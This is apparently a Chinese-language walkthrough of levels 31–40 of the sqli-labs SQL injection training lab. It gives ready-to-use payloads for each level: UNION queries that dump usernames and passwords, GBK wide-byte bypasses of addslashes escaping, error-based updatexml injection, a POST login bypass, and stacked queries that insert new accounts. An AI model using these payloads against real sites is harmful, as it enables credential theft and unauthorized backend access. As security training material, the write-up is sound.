在sqli-liabs学习SQL注入之旅（第三十一关~第四十关）

三十一关

（考察内容：双引号+括号、参数污染）

这一关和二十九、三十关几乎相同，这关参数接受方式为 id = ("&id"),直接爆出数据！

?id=1&id=0") union select 1,group_concat(username,password),3 from users--+

三十二关

（基于宽字符逃逸注入；简称：宽字节注入）

简单测试或分析源码，代码中利用正则匹配将 [ /，'，" ]这些三个符号都过滤掉了。

拓展学习：在mysql中，用于转义的函数有addslashes，mysql_real_escape_string，mysql_escape_string等，还有一种情况是magic_quote_gpc，不过高版本的PHP将去除这个特性，宽字节注入与HTML页面编码是无关的。

 （宽字节注入原理学习地址：https://blog.csdn.net/qq_41617034/article/details/106387973）

宽字节绕过思路

（1）思路一：

　　由于单引号被过滤了，所以我们使用%df吃掉 \， 具体的原因是urlencode(\') = %5c%27，我们在%5c%27前面添加%df，形成%df%5c%27，而上面提到的mysql在GBK编码方式的时候会将两个字节当做一个汉字，此事%df%5c就是一个汉字 ' 運 '，%27则作为一个单独的符号在外面，同时也就达到了我们的目的。

（2）思路二

　　将 \' 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27的情况，后面的%5c会被前面的%5c给注释掉。这也是bypass的一种方法。

回到三十二关

?id=1%df' and '1'='1--+        页面正常

?id=1%df' order by 3--+        猜字段
   
?id=-1%df' union select 1,2,3--+     爆出数据显示点，记得要让 id=-1 才能正常报错

直接爆数据：
?id=-1%df' union select 1,group_concat(username,password),3 from users --+

三十三关

 这一关和三十二关类似，使用了addslashes()函数

话不多说，直接爆出数据 ：

?id=-1%df' union select 1,group_concat(username),group_concat(password) from users --+

三十四关

（POST型宽字节注入）

使用 账户：�' or 1=1#

        密码：12345                   密码随便填，成功绕过并登录

为什么是 � ，这里有解答：https://www.likecs.com/show-305687828.html

回显出注入点。（注意：这关我们可以使用联合注入、报错注入。过关方式不止一种!!）

uname=�' union select 1,2#&passwd=admin&submit=Submit

爆出数据库和版本：

uname=�' union select version(),database()#&passwd=admin&submit=Submit

爆出数据

uname=�' union select (select group_concat(username,password) from users),database()#&passwd=admin&submit=Submit

三十五关

（考察点：数字型、addslashes()函数过滤。）

这一关更加简单，知道参数接受为数字型后，直接爆表、列、数据:

我们直接爆数据：

?id=-1 union select 1,group_concat(username),group_concat(password) from users

还可以报错注入：

?id=1 and updatexml(1,concat(0x7e,database()),0)

三十六关

 这一关和前面的三十二关相同，使用宽字节注入即可。

直接爆数据：?id=-1%df' union select 1,group_concat(username,password),3 from users --+

 或者              ?id=-1%E6' union select 1,group_concat(username,password),3 from users --+

不同的字节闭合大同小异，最终都是为了将 \ 给转化成字体，实现绕过。

三十七关 

这一关是POST注入 + 单引号 + 宽字节注入。和三十四关一样，我们直接爆数据：

uname=�' union select (select group_concat(username,password) from users),database()#&passwd=admin&submit=Submit

三十八关

 （考察点：GET单引号+ 堆叠注入）

使用报错注入轻松拿下这一关 ：

id=1' or updatexml(1,concat(0x7e,database()),0)--+

但这关教会我们的是堆叠注入！堆叠注入原理：https://www.cnblogs.com/backlion/p/9721687.html

我们往数据库插入账户：guanjian  密码：guanjian

?id=0' ; insert into users(username,password) values('guanjian', 'guanjian')--+

查看mysql数据库，发现数据插入成功！！！

三十九关

 （考察点：GET数字型+ 堆叠注入）

?id=0; insert into users(username,password) values('guanjian1', 'guanjian1')--+

查看mysql数据库，发现数据插入成功！！！注意后面的 --+ 要加上！！ 

堆叠注入作用：当我们无法获取对方的数据库名、表名、列名时！我们可以直接插入一个账户，直接登录对方的后台。

四十关

 （考察点：GET数字型+ 堆叠注入）

 我们来完整的判断一次：

第一步：猜参数接受方式
?id=1'        页面报错
?id=1'--+     页面报错    页面无回显
?id=1')--+    页面正常    说明参数接受方式为：id = ('&id')

第二步：猜字段
?id=1') order by 3--+    页面正常
?id=1') order by 4--+    页面错误    临界值为3，字段为3

第三步：爆出回显点
?id=-1') union select 1,2,3--+

直接爆数据：?id=-1') union select 1,group_concat(username,0x3b,password),3 from users--+

使用堆叠注入，和前面两个基本相同。不同在于这关参数接受方式为 单引号+括号。

总结：

（1）学会了GET型、POST型宽字节注入；（重点：深入理解宽字节的含义）

（2）各种参数接受方式的堆叠注入；（重点：了解什么是mysql的堆叠）